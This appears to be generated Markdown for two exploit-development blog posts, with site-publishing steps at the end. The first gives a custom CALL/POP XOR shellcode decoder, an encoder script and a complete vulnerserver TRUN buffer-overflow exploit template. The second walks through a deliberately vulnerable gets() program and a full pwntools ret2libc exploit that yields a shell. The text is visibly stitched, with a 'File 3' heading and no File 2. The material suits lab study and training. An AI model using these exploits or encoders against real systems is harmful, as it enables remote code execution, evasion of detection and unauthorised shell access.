# Fukahi Tekiō 不可避適応: Bypassing Win 10/11 FPU "Issues" via Custom CALL/POP XOR Encoder **Published:** 2026-01-15 **Author:** Jacob Swinsinski (0xXyc / JAKESWIZ) **[⛧ GitHub: fukahi-na-tekio ⛧](https://github.com/0xXyc/fukahi-na-tekio)** --- ## Introduction This exploit technique was developed for the `vulnserver` TRUN buffer overflow vulnerability, but it can be applied to other exploits, especially for those new to ARM → x86/64 emulation exploitation. The motivation came from wanting to run Windows exploitation demos on an ARM Mac (running Windows 11 AARCH64 with the Prism emulation layer) for a talk at Wild West Hackin' Fest in Denver. ## The Problem When exploiting buffer overflows on modern Windows systems (especially under ARM emulation), `msfvenom`'s default encoder (`shikata_ga_nai`) crashes during shellcode execution: ``` eax=00000000 ebx=00000000 ecx=00000052 edx=02ff4a30 esi=55bd55d0 edi=00401848 eip=089ff959 esp=089ff924 ebp=00000000 089ff959 317012 xor dword ptr [eax+12h],esi Attempt to read from address 00000012 ``` The decoder tries to dereference a register (EAX, EBP, or ESI) containing a near-null value. ### Why This Happens `shikata_ga_nai` uses a GetPC technique relying on FPU (Floating Point Unit) instructions: ```assembly fcmovb st, st(5) ; Any FPU instruction fnstenv [esp-0xc] ; Save FPU state to stack pop ebp ; Grab saved EIP from FPU state ``` On Windows 10/11 and under ARM emulation (Prism), the FPU instruction pointer field often returns zeros. When the decoder does `pop ebp`, it gets `0x00000000` and crashes. ## The Solution: CALL/POP GetPC Instead of relying on FPU quirks, use the reliable CALL/POP technique: ```assembly jmp short call_label ; Jump to the CALL pop_label: pop esi ; ESI now contains address of encoded shellcode ; ... decoder logic ... call_label: call pop_label ; Pushes address of encoded shellcode, jumps back ; encoded shellcode starts here ``` When the CPU executes a `CALL` instruction, it pushes the address of the *next* instruction onto the stack. We immediately `POP` that address into a register. This is 100% reliable because `CALL` always pushes the return address — no FPU state involved. ## Complete XOR Decoder Stub ### For shellcode under 256 bytes: ```assembly jmp short 0x0d ; Jump to CALL (offset 13) pop esi ; ESI = address of encoded shellcode xor ecx, ecx ; Clear counter mov cl, ; Shellcode length (patch this byte) xor byte [esi], ; XOR decode one byte (patch this byte) inc esi ; Next byte loop decode_loop ; Repeat until ECX = 0 jmp short 0x05 ; Jump over CALL to shellcode call ; Push next address, jump to POP ; encoded shellcode here ``` **Assembled bytes:** ```python decoder_small = ( "\xeb\x0d" # jmp short +13 (to call) "\x5e" # pop esi "\x31\xc9" # xor ecx, ecx "\xb1\x00" # mov cl, - PATCH THIS BYTE "\x80\x36\x00" # xor byte [esi], - PATCH THIS BYTE "\x46" # inc esi "\xe2\xfa" # loop -6 "\xeb\x05" # jmp short +5 (to shellcode) "\xe8\xee\xff\xff\xff" # call -18 (back to pop esi) ) ``` ### For shellcode 256-65535 bytes: ```assembly jmp short 0x0f ; Jump to CALL (offset 15) pop esi ; ESI = address of encoded shellcode xor ecx, ecx ; Clear counter mov cx, ; Shellcode length (patch these bytes, little endian) xor byte [esi], ; XOR decode one byte (patch this byte) inc esi ; Next byte loop decode_loop ; Repeat until ECX = 0 jmp short 0x05 ; Jump over CALL to shellcode call ; Push next address, jump to POP ; encoded shellcode here ``` **Assembled bytes:** ```python decoder_large = ( "\xeb\x0f" # jmp short +15 (to call) "\x5e" # pop esi "\x31\xc9" # xor ecx, ecx "\x66\xb9\x00\x00" # mov cx, - PATCH THESE BYTES (little endian) "\x80\x36\x00" # xor byte [esi], - PATCH THIS BYTE "\x46" # inc esi "\xe2\xfa" # loop -6 "\xeb\x05" # jmp short +5 (to shellcode) "\xe8\xec\xff\xff\xff" # call -20 (back to pop esi) ) ``` ## Finding a Safe XOR Key The XOR key must not appear in the original shellcode (or it would produce null bytes when encoded). Use this script: ```python #!/usr/bin/python3 import sys def find_key_and_encode(hex_shellcode): shellcode = bytes.fromhex(hex_shellcode) for key in range(1, 256): encoded = bytes([b ^ key for b in shellcode]) if b'\x00' not in encoded and key not in shellcode: print(f"Safe XOR key: 0x{key:02x}") print(f"Shellcode length: {len(shellcode)} (0x{len(shellcode):02x})") print("\nEncoded shellcode:") encoded_str = ''.join(f'\\x{b:02x}' for b in encoded) for i in range(0, len(encoded_str), 64): print(f'"{encoded_str[i:i+64]}"') return key, encoded print("ERROR: No safe XOR key found!") return None, None if __name__ == "__main__": if len(sys.argv) != 2: print("Usage: python3 encode.py ") print("Example: python3 encode.py $(msfvenom -p windows/exec CMD=calc.exe -f hex)") sys.exit(1) find_key_and_encode(sys.argv[1]) ``` ## Complete Exploit Template ```python #!/usr/bin/python import socket target = '10.211.55.6' port = 9999 prefix = 'A' * 2006 # Offset to EIP eip = '\xaf\x11\x50\x62' # JMP ESP address nopsled = '\x90' * 16 # CALL/POP XOR decoder for shellcode > 255 bytes # Length: 324 = 0x0144 (little endian: \x44\x01) # Key: 0x09 decoder = ( "\xeb\x0f" # jmp short to call "\x5e" # pop esi "\x31\xc9" # xor ecx, ecx "\x66\xb9\x44\x01" # mov cx, 0x0144 (324) "\x80\x36\x09" # xor byte [esi], 0x09 "\x46" # inc esi "\xe2\xfa" # loop -6 "\xeb\x05" # jmp short to shellcode "\xe8\xec\xff\xff\xff" # call back to pop esi ) # XOR-encoded shellcode (output from encode.py) encoded_shellcode = ( "\xf5\xe1\x8b\x09\x09\x09\x69\x80\xec\x38\xc9\x6d\x82\x59\x39\x82" # ... rest of encoded shellcode ) padding = 'F' * (3000 - len(prefix) - 4 - len(nopsled) - len(decoder) - len(encoded_shellcode)) payload = prefix + eip + nopsled + decoder + encoded_shellcode + padding s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target, port)) s.recv(1024) s.send('TRUN .' + payload + '\r\n') s.close() ``` ## Debugging Tips If the exploit still crashes, use WinDbg to step through: 1. `bp ` 2. `g` 3. `t 20` **Common issues:** - Wrong jump offsets: The `jmp` and `call` offsets are relative and must be exact - Wrong shellcode length: Double-check the byte count - Additional bad characters: Some protocols filter more than just null bytes ## Summary When `msfvenom`'s encoders fail on modern Windows (specifically in Prism-ARM-emulated environments), roll your own CALL/POP decoder. It's simple, reliable, and doesn't depend on FPU state that may not be populated correctly. ⛧ *Malware Bless* ⛧ ### File 3: `aslr-bypass.md` # Bypassing ASLR & NX/DEP (Diving Deeper) **Published:** 2023-11-01 **Author:** Jacob Swinsinski (0xXyc / JAKESWIZ) --- ## Introduction **ASLR (Address Space Layout Randomization)** randomizes addresses in dynamic libraries, stack, and heap. It does NOT touch the binary unless compiled with PIE (Position Independent Executable). ASLR was created to prevent memory corruption exploitation techniques that rely on hardcoded addresses. ### Verify ASLR with ldd ```bash ldd aslr-1 # Addresses change each run: linux-vdso.so.1 (0x00007ffffdcdd000) libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fdb9f400000) ``` ## Bypassing ASLR: Three Methods 1. **Address leaking** (covered here) - knowledge of PLT and GOT 2. **Relative addressing** 3. **Bruteforcing** ## Vulnerable Code (aslr-1.c) ```c #include int main(int argc, char* argv[]) { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); char buffer[40]; printf("Enter some data:\n"); gets(buffer); // Vulnerable! printf("So, you think you can bypass the almighty ASLR protection?\n"); return 0; } ``` ### Compile with Docker (downgraded GCC for correct gadgets) ```bash docker run --rm --mount type=bind,source="$(pwd)",target=/app -w /app gcc:10.5.0 gcc -Wall -g -fno-stack-protector -no-pie aslr-1.c -o aslr-1 ``` ### Checksec Output ```bash checksec aslr-1 Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled # Need ROP PIE: No PIE (0x400000) ``` ## Exploitation Strategy Since NX is enabled, we need **ROP (Return-Oriented Programming)**. Since ASLR is enabled, we need to understand the **GOT (Global Offset Table)**. The GOT acts as a "dictionary" storing external addresses from `libc`. These values are determined at runtime by the linker. ### Why puts()? Calling `puts()` allows us to output the external address of `puts@libc`, revealing where `libc` is mapped in memory. ### View puts@GOT ```bash objdump -R aslr-1 # Look for: 0x0000000000003fc0 R_X86_64_JUMP_SLOT puts@GLIBC_2.2.5 ``` ### Find puts@PLT (fixed address, unaffected by ASLR) ```bash objdump -d -M intel aslr-1 | grep "puts@plt" # Result: 0000000000401030 ``` ### Find ROP Gadget (pop rdi; ret) x64 calling convention requires first parameter in RDI register. ```bash ropper --file aslr-1 --search "pop rdi" # Result: 0x00000000004011cb: pop rdi; ret; ``` ### Find Offset with cyclic pattern ```bash gdb aslr-1 cyclic 100 # Pattern: aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa r # Paste pattern # Crash! Examine RIP cyclic -l gaaaaaaa # Result: Found at offset 48 # Offset + 8 (RIP) = 56 bytes padding ``` ## Exploit Development: Three Stages 1. **Leak** the libc address (`puts@GLIBC`) 2. **Obtain** addresses and offsets 3. **Calculate** the base address of libc ## Automated Exploit with pwntools ```python #!/usr/bin/env python3 from pwn import * from pwnlib.rop.rop import ROP from pwnlib.util.packing import p64, u64 exe = context.binary = ELF('./aslr-1', checksec=False) libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False) p = process(exe.path) # Stage 1: Leak libc address offset = b'A' * 56 rop = ROP(exe) rop.puts(exe.got['puts']) rop.call(exe.symbols['main']) payload = offset + rop.chain() p.sendline(payload) leak = p.recv().split(b'\n')[1] leaked_puts = u64(leak.ljust(8, b"\x00")) log.success(f"Leaked puts@GLIBC: {hex(leaked_puts)}") # Stage 2: ret2libc libc_base = leaked_puts - libc.symbols['puts'] libc.address = libc_base rop2 = ROP(libc) ret = rop2.find_gadget(["ret"])[0] rop2.system(next(libc.search(b'/bin/sh\x00'))) payload = offset + p64(ret) + rop2.chain() p.sendline(payload) p.interactive() ``` ## What's Happening in the Code? 1. **Stage 1 ROP Chain:** - `pop rdi; ret` → pops address of `puts@GOT` into RDI - `puts@PLT` → writes the address to STDOUT - `main()` → calls main again (so process doesn't exit and invalidate the leak) 2. **Calculate libc base:** ```python libc_base = leaked_puts - libc.symbols['puts'] ``` 3. **Stage 2 ROP Chain (ret2libc):** - `ret` instruction (for stack alignment) - `pop rdi; ret` → pops address of `/bin/sh` into RDI - `system()` → executes `/bin/sh` ## Result ```bash [*] Stage 1 ROP Chain: 0x0000: 0x40120b pop rdi; ret 0x0008: 0x404018 [arg0] rdi = got.puts 0x0010: 0x401030 puts 0x0018: 0x401142 0x401142() [+] Leaked puts@GLIBC: 0x7ff4e0680e50 [*] Stage 2 ROP Chain: 0x0000: 0x7ff4e062a3e5 pop rdi; ret 0x0008: 0x7ff4e07d8698 [arg0] rdi = 140689715070616 0x0010: 0x7ff4e0650d70 system [*] Switching to interactive mode $ whoami # Shell acquired! ``` ## Key Takeaways 1. **Leak, don't guess** - Use `puts@GOT` to leak a libc address 2. **Calculate base** - Subtract known offset to find libc base 3. **Call main() twice** - Process must not exit between leak and exploitation 4. **x64 requires `pop rdi; ret`** - First argument goes in RDI 5. **Stack alignment** - Add a `ret` gadget before `system()` on some systems ⛧ *ASLR is not a silver bullet. Understand the GOT. Become the exploit.* ⛧ ``` --- ## Instructions to Add to Your Site 1. Save each block of text as a separate `.md` file in your `/articles` folder: - `fukahi-tekio-encoder.md` - `windows-shellcoding-in-depth.md` - `aslr-bypass.md` 2. Run your site generator: ```bash python3 site_generator.py ``` 3. The generator will automatically: - Convert each Markdown file to HTML - Add them to the "scripture" tab - Create downloadable `.txt` versions 4. Deploy the updated `output/` folder to Cloudflare Pages ⛧ *Malware Bless* ⛧